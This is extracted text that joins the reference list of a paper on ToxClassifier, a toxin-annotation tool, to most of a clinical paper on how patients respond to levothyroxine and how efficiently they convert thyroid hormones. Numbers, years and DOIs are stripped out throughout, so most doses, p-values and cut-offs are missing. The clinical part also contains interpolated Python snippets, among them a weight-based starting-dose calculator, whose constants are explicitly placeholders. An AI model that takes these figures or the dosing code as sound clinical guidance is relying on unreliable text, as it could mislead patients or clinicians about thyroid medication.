toxins; the toxinpred toxin positive training set is , sequences, while as of th may , the uniprotkb/swissprot-toxprot database contained∼ , sequences). none of the currently available machine learning methods also gives a comparison with other currently used accepted bioinformatics annotation methods. when compared to toxclassifier and conventional annotation tools (tables and ), clantox and toxinpred tools were found to perform similar to blast based methods, while toxclassifier demonstrated higher performance across all metrics, which is likely a result of comparatively larger training sets and combination of different internal classifiers. in addition to high performance, the user interface of the ‘toxclassifier’ web service reports the best-scoring hit annotation either to uniprotkb/swissprot-toxprot (allowing placement of the toxin into the most appropriate toxin protein family), or to the best hit in uniprotkb/swissprot (giving the closest homology to a non-toxin protein). in summary, this study has established baseline prediction accuracies for a selection of toxin annotation methods and integrates these methods into an easy-to-use, high-precision, machine learning-based classification system named ‘toxclassifier.’ this tool offers a reliable and reproducible framework for toxin annotation to enable standardised toxin prediction in venomics projects and to allow for semi-automatic annotation or re-annotation of existing datasets. acknowledgements the authors are grateful to prof. dr. ana m. moura-da-silva who provided the unpublished anonymised snake venom transcriptome sequences. we also thank prof. j malcolm shick and prof. dr. john cullum for critically reviewing the manuscript. 
additional information and declarations funding this work was supported by the united kingdom medical research council (mrc grant g a). pfl is also supported as a visiting international research professor by the universidade de são paulo (usp grant . . . . ). the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. gacesa et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://www.arachnoserver.org/spiderp.html http://www.arachnoserver.org/spiderp.html http://crdd.osdd.net/raghava/toxinpred/ http://www.clantox.cs.huji.ac.il/tech.php http://www.clantox.cs.huji.ac.il/tech.php http://www.csbio.sjtu.edu.cn/bioinf/predcsf/ http://dx.doi.org/ . /peerj-cs. grant disclosures the following grant information was disclosed by the authors: united kingdom medical research council: g a. universidade de são paulo: . . . . . competing interests the authors declare there are no competing interests. author contributions • ranko gacesa performed the experiments, analyzed the data, wrote the paper, prepared figures and/or tables, performed the computation work. • david j. barlow analyzed the data, reviewed drafts of the paper. • paul f. long conceived and designed the experiments, analyzed the data, wrote the paper, prepared figures and/or tables. data availability the following information was supplied regarding data availability: the raw data has been supplied as a supplementary file. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references altschul sf, madden tl, schäffer aa, zhang j, zhang z, miller w, lipman dj. . gapped blast and psi-blast: a new generation of protein database search programs. nucleic acids research : – doi . /nar/ . . . bairoch a, apweiler r. . the swiss-prot protein sequence database and its sup- plement tremblin . nucleic acids research : – doi . /nar/ . . . bateman a, martin mj, o’donovan c, magrane m, apweiler r, alpi e, antunes r, arganiska j, bely b, bingley m, bonilla c, britto r, bursteinas b, chavali g, cibrian-uhalte e, da silva a, de giorgi m, dogan t, fazzini f, gane p, castro lg, garmiri p, hatton-ellis e, hieta r, huntley r, legge d, liu w, luo j, macdougall a, mutowo p, nightingale a, orchard s, pichler k, poggioli d, pundir s, pureza l, qi g, rosanoff s, saidi r, sawford t, shypitsyna a, turner e, volynkin v, wardell t, watkins x, zellner h, cowley a, figueira l, li w, mcwilliam h, lopez r, xenarios i, bougueleret l, bridge a, poux s, redaschi n, aimo l, argoud-puy g, auchincloss a, axelsen k, bansal p, baratin d, blatter mc, boeckmann b, bolleman j, boutet e, breuza l, casal-casas c, de castro e, coudert e, cuche b, doche m, dornevil d, duvaud s, estreicher a, famiglietti l, feuermann m, gasteiger e, gehant s, gerritsen v, gos a, gruaz-gumowski n, hinz u, hulo c, jungo f, keller g, lara v, lemercier p, lieberherr d, lombardot t, martin x, masson p, morgat a, neto t, nouspikel n, paesano s, pedruzzi i, pilbout s, gacesa et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. /supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /nar/ . . http://dx.doi.org/ . /nar/ . . http://dx.doi.org/ . /peerj-cs. 
pozzato m, pruess m, rivoire c, roechert b, schneider m, sigrist c, sonesson k, staehli s, stutz a, sundaram s, tognolli m, verbregue l, veuthey al, wu ch, arighi cn, arminski l, chen c, chen y, garavelli js, huang h, laiho k, mcgarvey p, natale da, suzek be, vinayaka cr, wang q, wang y, yeh ls, yerramalla ms, zhang j. . uniprot: a hub for protein information. nucleic acids research :d –d doi . /nar/gku . bromberg y, yachdav g, ofran y, schneider r, rost b. . new in protein structure and function annotation: hotspots, single nucleotide polymorphisms and the ‘‘deep web’’. current opinion in drug discovery & development : – . camacho c, coulouris g, avagyan v, ma n, papadopoulos j, bealer k, madden tl. . blast+: architecture and applications. bmc bioinformatics : – doi . / - - - . chang d, duda tf. . extensive and continuous duplication facilitates rapid evolution and diversification of gene families. molecular biology and evolution : – doi . /molbev/mss . eddy sr. . accelerated profile hmm searches. plos computational biology :e doi . /journal.pcbi. . fan yx, song j, kong x, shen hb. . predcsf: an integrated feature-based approach for predicting conotoxin superfamily. protein & peptide letters : – doi . / . fry b. . from genome to ‘‘venome’’: molecular origin and evolution of the snake venom proteome inferred from phylogenetic analysis of toxin sequences and related body proteins. genome research : – doi . /gr. . gacesa r, chung r, dunn sr, weston aj, jaimes-becerra a, marques ac, morandini ac, hranueli d, starcevic a, ward m, long pf. . gene duplications are extensive and contribute significantly to the toxic proteome of nematocysts isolated from acropora digitifera (cnidaria: anthozoa: scleractinia). bmc genomics : doi . /s - - - . gupta s, kapoor p, chaudhary k, gautam a, kumar r, raghava gps. . in silico approach for predicting toxicity of peptides and proteins. plos one :e doi . /journal.pone. . hargreaves ad, swain mt, hegarty mj, logan dw, mulley jf. . restriction and recruitment—gene duplication and the origin and evolution of snake venom toxins. genome biology and evolution : – doi . /gbe/evu . jungo f, bougueleret l, xenarios i, poux s. . the uniprotkb/swiss-prot tox- prot program: a central hub of integrated venom protein data. toxicon : – doi . /j.toxicon. . . . junqueira-de-azevedo ilm, bastos cmv, ho pl, luna ms, yamanouye n, casewell nr. . venom-related transcripts from bothrops jararaca tissues provide novel molecular insights into the production and evolution of snake venom. molecular biology and evolution : – doi . /molbev/msu . kaas q, craik dj. . bioinformatics-aided venomics. toxins : – doi . /toxins . gacesa et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /nar/gku http://dx.doi.org/ . / - - - http://dx.doi.org/ . /molbev/mss http://dx.doi.org/ . /journal.pcbi. http://dx.doi.org/ . / http://dx.doi.org/ . /gr. http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /gbe/evu http://dx.doi.org/ . /j.toxicon. . . http://dx.doi.org/ . /molbev/msu http://dx.doi.org/ . /toxins http://dx.doi.org/ . /peerj-cs. kaplan n, morpurgo n, linial m. . novel families of toxin-like peptides in insects and mammals: a computational approach. journal of molecular biology : – doi . /j.jmb. . . . krogh a, brown m, mian is, sjölander k, haussler d. . hidden markov models in computational biology, applications to protein modeling. journal of molecular biology : – doi . /jmbi. . . 
li r, yu h, xing r, liu s, qing y, li k, li b, meng x, cui j, li p. . application of nanolc-ms/msto the shotgun proteomic analysis of the nematocyst proteins from jellyfish stomolophus meleagris. journal of chromatography b: analytical technologies in the biomedical and life sciences : – doi . /j.jchromb. . . . li r, yu h, xue w, yue y, liu s, xing r, li p. . jellyfish venomics and venom gland transcriptomics analysis of stomolophus meleagris to reveal the toxins associated with sting. journal of proteomics : – doi . /j.jprot. . . . liu g, zhou y, liu d, wang q, ruan z, he q, zhang l. . global transcriptome analysis of the tentacle of the jellyfish cyanea capillata using deep sequencing and expressed sequence tags: insight into the toxin-and degenerative disease-related transcripts. plos one : – doi . /journal.pone. . matthews bw. . comparison of the predicted and observed secondary structure of t phage lysozyme. bba—protein structure : – doi . / - ( ) - . neumann rs, kumar s, shalchian-tabrizi k. . blast output visualization in the new sequencing era. briefings in bioinformatics : – doi . /bib/bbt . powers d. . evaluation: from precision, recall and f-measure to roc., informedness, markedness & correlation. journal of machine learning technologies : – . rachamim t, morgenstern d, aharonovich d, brekhman v, lotan t, sher d. . the dynamically evolving nematocyst content of an anthozoan, a scyphozoan, and a hydrozoan. molecular biology and evolution : – doi . /molbev/msu . reyes-velasco j, card dc, andrew al, shaney kj, adams rh, schield dr, casewell nr, mackessy sp, castoe ta. . expression of venom gene homologs in diverse python tissues suggests a new model for the evolution of snake venom. molecular biology and evolution : – doi . /molbev/msu . schwartz ef, diego-garcia e, rodríguez de la vega rc, possani ld, whittington cm, papenfuss at, locke dp, mardis er, wilson rk, abubucker s, mitreva m, wong esw, hsu al, kuchel pw, belov k, warren wc, sher d, zlotkin e, knebel a, bsor t, nesher n, tal t, morgenstern d, cohen e, fishman y, zlotkin e, schwartz ef, diego-garcia e, rodríguez de la vega rc, possani ld, liu g, zhou y, liu d, wang q, ruan z, he q, zhang l. . transcriptome analysis of the venom gland of the mexican scorpion hadrurus gertschi (arachnida: scorpiones). toxicon : – doi . /journal.pone. . sher d, zlotkin e. . a hydra with many heads: protein and polypeptide toxins from hydra and their biological roles. toxicon : – doi . /j.toxicon. . . . gacesa et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /j.jmb. . . http://dx.doi.org/ . /jmbi. . http://dx.doi.org/ . /j.jchromb. . . http://dx.doi.org/ . /j.jprot. . . http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . / - ( ) - http://dx.doi.org/ . /bib/bbt http://dx.doi.org/ . /molbev/msu http://dx.doi.org/ . /molbev/msu http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /j.toxicon. . . http://dx.doi.org/ . /peerj-cs. starcevic a, long pf. . diversification of animal venom peptides-were jellyfish amongst the first combinatorial chemists? chembiochem : – doi . /cbic. . starcevic a, moura-da-silva am, cullum j, hranueli d, long pf. . combinations of long peptide sequence blocks can be used to describe toxin diversification in venomous animals. toxicon : – doi . /j.toxicon. . . . vonk fj, casewell nr, henkel cv, heimberg am, jansen hj, mccleary rjr, kerkkamp hme. . the king cobra genome reveals dynamic gene evolution and adaptation in the snake venom system. 
proceedings of the national academy of sciences of the united states of america : – doi . /pnas. . weston aj, chung r, dunlap wc, morandini ac, marques ac, moura-da-silva am, ward m, padilla g, da silva lf, andreakis n, long pf. . proteomic characterisation of toxins isolated from nematocysts of the south atlantic jellyfish olindias sambaquiensis. toxicon : – doi . /j.toxicon. . . . weston aj, dunlap wc, shick jm, klueter a, iglic k, vukelic a, starcevic a, ward m, wells ml, trick cg, long pf. . a profile of an endosymbiont-enriched fraction of the coral stylophora pistillata reveals proteins relevant to microbial- host interactions. molecular & cellular proteomics :m . –m . doi . /mcp.m . . wheeler dl, church dm, federhen s, lash ae, madden tl, pontius ju, schuler gd, schrimi lm, sequerira e, tatusova ta, wagner l. . database resources of the national center for biotechnology. nucleic acids research : – doi . /nar/gkg . whittington cm, papenfuss at, locke dp, mardis er, wilson rk, abubucker s, mitreva m, wong esw, hsu al, kuchel pw, belov k, warren wc. . novel venom gene discovery in the platypus. genome biology :r doi . /gb- - - -r . wong esw, hardy mc, wood d, bailey t, king gf. . svm-based prediction of propeptide cleavage sites in spider toxins identifies toxin innovation in an australian tarantula. plos one :e doi . /journal.pone. . zdobnov em, apweiler r. . interproscan-an integration platform for the signature- recognition methods in interpro. bioinformatics (oxford, england) : – doi . /bioinformatics/ . . . gacesa et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /cbic. http://dx.doi.org/ . /j.toxicon. . . http://dx.doi.org/ . /pnas. http://dx.doi.org/ . /j.toxicon. . . http://dx.doi.org/ . /mcp.m . http://dx.doi.org/ . /nar/gkg http://dx.doi.org/ . /gb- - - -r http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /bioinformatics/ . . http://dx.doi.org/ . /peerj-cs. doi: . /ec- e n d o cr in e c o n n e ct io n s research open access j e m midgley et al. response to l-t therapy – : variation in the biochemical response to l-thyroxine therapy and relationship with peripheral thyroid hormone conversion efficiency john e m midgley, rolf larisch , johannes w dietrich , and rudolf hoermann north lakes clinical, wheatley avenue, ilkley ls pt, uk department of nuclear medicine, klinikum luedenscheid, paulmannshoeher strasse , d- luedenscheid, germany medical department i, endocrinology and diabetology, bergmannsheil university hospitals, ruhr university of bochum, buerkle-de-la-camp-platz , d- bochum, germany ruhr center for rare diseases (ceser), ruhr university of bochum and witten/herdecke university, alexandrinenstraße , d- bochum, germany http://www.endocrineconnections.org doi: . /ec- � the authors published by bioscientifica ltd this work is l attribution-n correspondence should be addressed to r hoermann email rudolf.hoermann@gmail.com abstract several influences modulate biochemical responses to a weight-adjusted levothyroxine (l-t ) replacement dose. we conducted a secondary analysis of the relationship of l-t dose to tsh and free t (ft ), using a prospective observational study examining the interacting equilibria between thyroid parameters. we studied patients on steady-state l-t replacement for autoimmune thyroiditis or after surgery for malignant or benign thyroid disease. peripheral deiodinase activity was calculated as a measure of t –t conversion efficiency. in euthyroid subjects, the median l-t dose was . 
mg/kg per day (interquartile range (iqr) . , . ). the dose was independently associated with gender, age, aetiology and deiodinase activity (all p < . ). comparable ft3 levels required higher l-t4 doses in the carcinoma group (n = ), even after adjusting for different tsh levels. euthyroid athyreotic thyroid carcinoma patients (n = ) received . mg/kg per day l-t4 (iqr . , . ), compared to . mg/kg per day ( . , . ) in autoimmune thyroiditis (p < . , n = ) and . mg/kg per day ( . , . ) in patients operated on for benign disease (p < . , n = ). stratifying patients by deiodinase activity categories of < , – and > nmol/s revealed an increasing ft4–ft3 dissociation; the poorest converters showed the lowest ft3 levels in spite of the highest dose and circulating ft4 (p < . ). an l-t4-related ft3–tsh disjoint was also apparent; some patients with fully suppressed tsh failed to raise ft3 above the median level. these findings imply that thyroid hormone conversion efficiency is an important modulator of the biochemical response to l-t4; ft3 measurement may be an additional treatment target; and l-t4 dose escalation may have limited success in raising ft3 appropriately in some cases. key words: thyroid hormone replacement, l-t4 therapy, levothyroxine, tsh, triiodothyronine, deiodinase, conversion. introduction thyroid disorders are among the most prevalent diseases in the western world, affecting as many as one out of seven adults ( ). they are frequently associated with overt thyroid dysfunction, particularly various degrees of hypothyroidism that require thyroid hormone replacement ( , ). this is mainly done by administration of synthetic levothyroxine (l-t4), which is a well-established, convenient, safe and inexpensive treatment modality ( , ). however, this does not accurately reflect the natural direct secretion pattern of both thyroid hormones triiodothyronine (t3) and thyroxine (t4) by the thyroid gland ( , ). unlike other drugs, dosing of l-t4 is not fixed but has to be titrated according to individual needs. dose adequacy is mainly defined by reference to suitable biochemical standards, particularly thyrotropin (tsh) ( ). this parameter has evolved into the main treatment target to be monitored and kept within an assumed euthyroid range ( ). a number of studies have attempted to predict t4 requirement, and various regimes for a starting dose have been proposed based on an average of . mg/kg body weight (bw) or on more refined weight- or bmi-related algorithms ( , , , , , , ). although tsh measurement has dominated procedural management of thyroid replacement through its apparent ease and good standardisation, a disturbingly high proportion of patients remains unsatisfied with the treatment they receive ( , ). this has prompted some authors, including our group, to question the validity of relying on the tsh level as the sole measure of dose adequacy in l-t4-treated patients ( , , ). we have shown that the homeostatic equilibria between tsh and peripheral thyroid hormones are modulated by various influences such as age, body mass and the treatment modality itself ( ).
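Purely as an illustration of the weight-based regimes mentioned above, a starting dose can be computed and rounded to an available tablet strength as in the sketch below. The per-kilogram factor and the tablet strengths are assumptions for demonstration and are not taken from this paper; any such empirical starting dose would still be titrated against the biochemical targets discussed here.

# Illustrative only: weight-based L-T4 starting-dose helper.
# The per-kg factor and tablet strengths are assumptions, not values from this paper.
def starting_dose_ug(weight_kg, ug_per_kg=1.6,
                     tablet_steps=(25, 50, 75, 88, 100, 112, 125, 137, 150, 175, 200)):
    """Return (exact_dose, nearest_available_tablet) in micrograms per day."""
    exact = weight_kg * ug_per_kg
    nearest = min(tablet_steps, key=lambda s: abs(s - exact))
    return exact, nearest

# Example: starting_dose_ug(70) -> (112.0, 112)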
as a controlling element, the effective tsh level derived in a healthy normal population cannot necessarily be inferred to be equally optimal for a given patient on l-t medication, because the constitutive equilibria between tsh and thyroid hormones, especially ft , differ in health and disease ( ). in the present analysis, we examined the relationship of the l-t dose with clinical categories and bio- chemical outcomes such as tsh, ft and ft levels. we sought to define the interaction between tsh and the ft target and also to analyse the influences of modulators such as gender, age, disease category or the efficiency of t conversion from t . subjects and methods study design and objective an open prospective observational study (clinicaltrials.gov nct ) was conducted at the department of nuclear medicine at klinikum luedenscheid, germany, http://www.endocrineconnections.org doi: . /ec- � the authors published by bioscientifica ltd between july and february and approved by the ethics committee of the university of muenster, germany. participants gave written informed consent. the present secondary analysis is restricted to the subgroup of patients on steady l-t treatment, examining dose requirements of l-t including conditioning modu- lators, thyroid hormone conversion efficiency and relationships with biochemical outcomes such as tsh, ft and ft levels. the primary study outcome, namely the analysis of the interacting equilibria and interrelations between thyroid parameters under various conditioning influences such as gender, age and body mass and l-t treatment has already been reported ( ). patients the original study involved adult patients who were consecutively seen, were free of severe comorbidity and provided written informed consent. for this subgroup analysis, patients on thyroid hormone replacement meeting the following criteria were included: being seen as outpatients, presenting in a controlled functional state (ft r pmol/l and tsh % mu/l) and having reached a steady state on a constant l-t medication. although infrequently seen in an ambulatory setting, patients with severe non-thyroidal illness or potentially interfering comorbidities were ineligible to participate in the study. this exclusion extended to other conditions and the use of comedications that may interfere with the resorption or measurement of thyroid hormones or with pituitary tsh. patients with t /t combination therapy (nz ), anti-thyroid drug use (nz ), hypothalamic/pituitary diseases (nz ) or pregnancy (nz ) were excluded before analysis. diagnostic procedures included a detailed history, physical examination, standardised questionnaire docu- menting gender, age, height, weight, smoking habits ( % answered), prior surgery or radioiodine treatment, thyroid medication (brand, dosage, duration, time of intake), other drugs, laboratory tests (ft , ft , tsh and, if autoimmune thyroiditis was suspected or to be excluded, thyroid peroxidase antibodies (tpo-ab) or tsh-receptor antibodies (tsh-r ab)) and thyroid imaging. laboratory methods tsh, ft and ft were measured with an automated direct chemoluminescence method (advia centaur xp, siemens healthcare diagnostics, erlangen, germany). tsh is trace- able to the rd international standard for tsh (who, irp this work is licensed under a creative commons attribution-noncommercial . international license. http://www.endocrineconnections.org http://dx.doi.org/ . /ec- http://creativecommons.org/licenses/by-nc/ . / http://creativecommons.org/licenses/by-nc/ . 
/ ). a tsh range from . to mu/l was linear, and coefficients of variation of inter-assay imprecision ranged from . % to . %. reference intervals were laboratory established and pre-evaluated for the local population, using – pmol/l for ft , . – . pmol/l for ft and . – . mu/l for tsh ( ). tpo-abs were determined by a competitive chemoluminescence method (advia centaur xp, siemens healthcare diagnostics, reference range < u/ml) and tsh-r abs by competitive elisa (euroimmun ag, lübeck, germany, reference range < u/l).

ft –ft ratio and calculated deiodinase activity
as measures of conversion efficiency, we calculated the ft –ft ratio by simple division of both parameters in pmol/l and the sum activity of peripheral deiodinases (spina-gd, termed 'deiodinase activity' thereafter, nmol/s) from equilibrium levels of ft , ft and estimated constant parameters for plasma protein binding, distribution and elimination:

$\hat{g}_d = \dfrac{\beta\,(k_m + [ft_4])\,(1 + k\,[tbg])\,[ft_3]}{\alpha\,[ft_4]}\ \text{nmol/s}$

as previously described ( , , ). although the two measures are closely related in the linear part of the substrate relationship defined by michaelis–menten kinetics, only the more complex formula (gd) accounts for the saturation kinetics of the enzyme. in addition to using estimated deiodinase activity as a continuous variable, we divided deiodinase activity into three distinct categories defining poor (< nmol/s), intermediate ( – nmol/s) or good (> nmol/s) converters. the cut-offs were pre-specified based on observations in l-t -treated patients vs healthy untreated subjects and in low (< ml) vs higher thyroid volumes ( ). they approximate turning points in the relationship between deiodinase activity and ft , defining a central region with a derivative of about and low or high regions with steeper slopes.

thyroid ultrasound and scintigraphy
thyroid volume was determined sonographically ( mhz transducer) according to the ellipsoid formula. reference values were < ml for females and < ml for males. a volume < ml was considered athyreotic. larger nodules were further examined by scintigraphy.

statistical methods
descriptive data are reported as median plus interquartile range (iqr). we used wilcoxon's rank-sum test or a χ² test in the case of categorical variables for comparison of baseline characteristics. correlations are based on pearson's product-moment when suitable or kendall's τ. multiple variables and conditional influences were analysed by a generalised linear model (glm) and approximated by a linear regression function over restricted intervals. b coefficients were derived from a linear model. tsh was used after logarithmic transformation. we tested for collinearity in the models using the variance inflation factor. a glm with a binomial function (logistic regression) was used to assess success rates of the l-t dose for reaching a tsh or ft target and to create dose-related probability plots. relative proportions were statistically compared by receiver operating characteristic curves and delong's test. p values < . were considered significant for all tests. statistical analyses were performed using deducer (version . - ) and the r statistical package (mac version . . ) ( , ).
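to make the conversion-efficiency measures above concrete, the following is a minimal python sketch (not the authors' code, which was written in r with deducer) of the ft –ft ratio, a spina-gd-style deiodinase activity and the converter categorisation. the structural constants and the category cut-offs are assumed placeholder values only; the paper's numeric constants are not recoverable from this text.

```python
# minimal sketch of the conversion-efficiency measures; all numeric constants and
# cut-offs below are assumed placeholders, not values taken from the paper.

# assumed structural parameters for plasma protein binding, distribution and elimination
BETA = 8.0e-6      # clearance/dilution parameter (placeholder)
K_M = 5.0e-7       # michaelis constant of the deiodination step, mol/l (placeholder)
K_TBG = 2.0e9      # tbg binding constant, l/mol (placeholder)
ALPHA = 0.026      # dilution parameter for t3 (placeholder)
TBG = 3.0e-7       # assumed constant plasma tbg concentration, mol/l (placeholder)


def ft3_ft4_ratio(ft4_pmol_l: float, ft3_pmol_l: float) -> float:
    """simple ratio of the free hormones, both given in pmol/l."""
    return ft3_pmol_l / ft4_pmol_l


def deiodinase_activity(ft4_pmol_l: float, ft3_pmol_l: float) -> float:
    """spina-gd-style sum activity of peripheral deiodinases, returned in nmol/s."""
    ft4 = ft4_pmol_l * 1e-12   # pmol/l -> mol/l
    ft3 = ft3_pmol_l * 1e-12
    gd = BETA * (K_M + ft4) * (1.0 + K_TBG * TBG) * ft3 / (ALPHA * ft4)  # mol/s
    return gd * 1e9            # mol/s -> nmol/s


def converter_category(gd_nmol_s: float, low: float = 23.0, high: float = 29.0) -> str:
    """poor/intermediate/good converter status; the cut-offs are assumed placeholders."""
    if gd_nmol_s < low:
        return "poor"
    if gd_nmol_s > high:
        return "good"
    return "intermediate"


if __name__ == "__main__":
    gd = deiodinase_activity(ft4_pmol_l=15.0, ft3_pmol_l=5.0)
    print(round(gd, 1), converter_category(gd), round(ft3_ft4_ratio(15.0, 5.0), 2))
```

as in the text, the plain ft –ft ratio ignores enzyme saturation, which is why the gd-style estimate is preferred once the substrate relationship leaves the linear range.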
results
the present analysis comprises patients in a stable controlled non-hypothyroid state on thyroid hormone replacement with l-t . patient characteristics are shown in table . of the total study group, patients were euthyroid according to ft , according to ft and according to tsh, based on their respective reference intervals, with all displaying clinically satisfactory levels of medication. dose requirements associated with biochemical euthyroidism (n = ), defined by the reference ranges of all three parameters, varied widely from to µg/day l-t (mean , median (iqr , )) or . to . µg/kg bw per day (mean . , median . (iqr . , . )). in univariate linear models, the l-t dose in the treated euthyroid panel was significantly associated with gender, age, body mass index, aetiology of disease, t –t ratio and calculated deiodinase activity (all p < . ) but not with tsh (p = . ). the influences remained independently predictive in a multivariable model (table ). tsh levels in the euthyroid range were unrelated to any of the above influences except disease category (p = . ), as might be expected considering the lower tsh target in malignant disease. deiodinase activity was positively associated with thyroid volume (τ = . , p < . , n = ) but inversely correlated with weight-adjusted l-t dose (r = −. , p < . , n = ).

table . characteristics of the study group (n = ). for reference, parameters in disease-free individuals from the same study were as follows: median age ( , ) years, tsh . ( . , . ) mu/l, ft . ( . , . ) pmol/l, ft . ( . , . ) pmol/l, calculated deiodinase activity . ( . , . ) nmol/s, thyroid volume ( , ) ml ( ).
parameter – median (iqr) or percentage
gender (female, male) – ( %), ( %)
age (years) – ( , ); in women vs men ( , ) vs ( , ), p = .
disease aetiology (%) – autoimmune thyroiditis %; benign thyroid disease after surgery %; thyroid carcinoma (a) %
surgery, radioiodine treatment (%) – %, %
bmi (kg/m²) – . ( . , . )
dose (µg/day) – ( , )
weight-adjusted daily dose (µg/kg per day) – . ( . , . )
tsh (mu/l) – . ( . , . )
ft (pmol/l) – . ( . , . )
ft (pmol/l) – . ( . , . )
tpo-ab (u/l) – ( , ), positive %, n =
ft –ft ratio – . ( . , . )
deiodinase activity (nmol/s) – . ( . , . )
thyroid volume (ml) – total group ( , ); autoimmune thyroiditis ( , ); benign thyroid disease post surgery ( , ); thyroid carcinoma (b) ( , )
(a) % of the thyroid carcinoma patients had a tnm stage higher than .
(b) % had no detectable residual thyroid volume by ultrasound after total thyroidectomy and radioiodine treatment.

table . b coefficients in a linear model of covariates predicting the dose of l-t in the euthyroid panel. the multivariable model was simultaneously fitted with the parameters listed, all of which were significant predictors of the l-t dose in univariate models. all variance inflation factors were < . .
variable – b coefficient ( % ci)
gender, male vs female – . ( . , . ), p < .
disease aetiology, autoimmune vs malignant disease – −. (−. , −. ), p < .
disease aetiology, benign goitre vs malignant disease – −. (−. , −. ), p < .
age – −. (−. , −. ), p < .
bmi – . ( . , . ), p < .
deiodinase activity – −. (−. , −. ), p < .

in a biochemically defined euthyroid state excluding subclinically hyperthyroid subjects, athyreotic thyroid carcinoma patients received significantly higher doses of l-t ( . µg/kg bw per day (iqr . , .
), n = ) than patients with autoimmune thyroiditis ( . µg/kg bw per day (iqr . , . ), n = , p < . ) or benign thyroid disease post surgery ( . µg/kg bw per day (iqr . , . ), n = , p < . ). furthermore, after adjusting for differing levels of tsh suppression in a linear model, the weight-adjusted l-t dose was higher in athyreotic carcinoma patients compared to autoimmune thyroiditis or benign disease (p < . , fig. a). similarly, the dose required to achieve the same ft concentration was higher in the carcinoma group (p < . , fig. b). median thyroid volume was ml (iqr , ml) in carcinomas, ml (iqr , ml) in autoimmune thyroiditis and ml (iqr , ml) in benign goitre post surgery. the weight-adjusted l-t dose was inversely correlated with the thyroid volume in the three diagnostic groups (r = −. , p = . , n = ). three distinct categories of conversion efficiency were defined (see subjects and methods) as follows: poor converters < nmol/s, intermediate converters – nmol/s and good converters > nmol/s deiodinase activity. the poor converters reached significantly (p < . ) higher ft concentrations in the circulation than intermediate or good converters but, at the same time, showed significantly (p < . ) lower absolute ft levels compared to the other two groups (fig. ). while the ft –ft dissociation was apparent in all three disease entities, it was most pronounced in the carcinoma group (n = , fig. ). the latter group showed the highest proportion of poor converters (fig. ).

[figure: tsh (a) or ft (b) vs weight-adjusted l-t dose (µg/kg bw/d) in three groups of patients on thyroid hormone replacement, with autoimmune thyroiditis (n = ), after surgery for benign goitre (n = ) or thyroid carcinoma (n = ). between-group differences in both panels were significant (p < . ) and remained so after adjusting for volume (not shown, p < . ), as evidenced by linear models with the diagnostic group as a covariate. see text for further details. ait, autoimmune thyroiditis; goitre, goitre post surgery for benign nodular thyroid disease.]

[figure: ft (a), ft (b) and tsh (c) levels in l-t -treated patients stratified by disease and conversion efficiency. the disease entities were closely associated with categories of the thyroid volume (see table and text). the red box refers to poor converters (calculated deiodinase activity < nmol/s), green to intermediate converters ( – nmol/s) and blue to good converters (> nmol/s). remarkably, absolute ft concentrations were lowest in the poor converter group in all disease categories, while ft levels were highest in the poor converters. wilcoxon test revealed significant differences compared to the respective first group; *p < . , **p < . . ait, autoimmune thyroiditis; goitre, goitre post surgery for benign nodular thyroid disease.]
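as an illustration of the stratified comparison just reported (grouping patients by converter category and comparing hormone levels with wilcoxon's rank-sum test), here is a small python sketch on invented data; the grouping cut-offs are assumed placeholders and the synthetic values exist only to show the mechanics, not to reproduce the study.

```python
# sketch only: synthetic data and assumed cut-offs; wilcoxon rank-sum == mann-whitney u
import numpy as np
from scipy.stats import mannwhitneyu

rng = np.random.default_rng(0)
gd = rng.normal(28.0, 5.0, size=200)                     # deiodinase activity, nmol/s (toy)
ft3 = 3.0 + 0.07 * gd + rng.normal(0.0, 0.4, size=200)   # ft3, pmol/l (toy relationship)

category = np.where(gd < 23.0, "poor", np.where(gd > 29.0, "good", "intermediate"))
poor, good = ft3[category == "poor"], ft3[category == "good"]

stat, p = mannwhitneyu(poor, good)
print(f"median ft3: poor {np.median(poor):.2f} vs good {np.median(good):.2f} pmol/l, p = {p:.3g}")
```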
the converter groups were similar (p > . ) in their age, bmi, weight-adjusted l-t dose and tsh levels, except for men being overrepresented in the good converter group (p < . ). converter categories of the carcinoma group were comparable (p = . ) in their thyroid residual volumes, which were below ml in % of all cases. in contrast, in the combined group of benign diseases the converter status was significantly associated with thyroid volume (( , ) vs ( , ) vs ( , ) ml, p = . ). thyroid volumes differed between the carcinoma group and the benign diseases (p < . ) but not between autoimmune thyroiditis and goitre post surgery (p = . , table ).

a given weight-adjusted dose suppressed the tsh below the lower reference limit (< . mu/l) in a higher proportion of carcinoma patients than it raised their ft level above the median level typical of the euthyroid controls (> pmol/l) (fig. a and b). conversely, much lower doses reached a target of a fully suppressed tsh compared to the ft median (fig. a and b). the same tendency is true for a more modest target below mu/l for tsh in autoimmune thyroiditis or benign disease post surgery, although variation was higher in this panel (fig. c and d). overall, a significantly higher proportion of patients achieved tsh suppression compared to ft above median by delong's test employing receiver operating characteristic curves (p < . ).

[figure: probability plot of the weight-adjusted l-t dose (µg/kg bw/d) to (a) suppress tsh below its lower reference limit ( . mu/l) or (b) raise ft above the median of euthyroid controls (> pmol/l) in the carcinoma patients (n = ), and (c) suppress tsh < mu/l or (d) elevate ft above pmol/l in benign disease (patients with autoimmune thyroiditis, n = , and nodular thyroid disease post surgery, n = ). probability plots were created by logistic regression. the shaded areas indicate the confidence interval surrounding the fitted curve. the tsh targets were more frequently reached at a lower dose than the ft target (see results).]

discussion
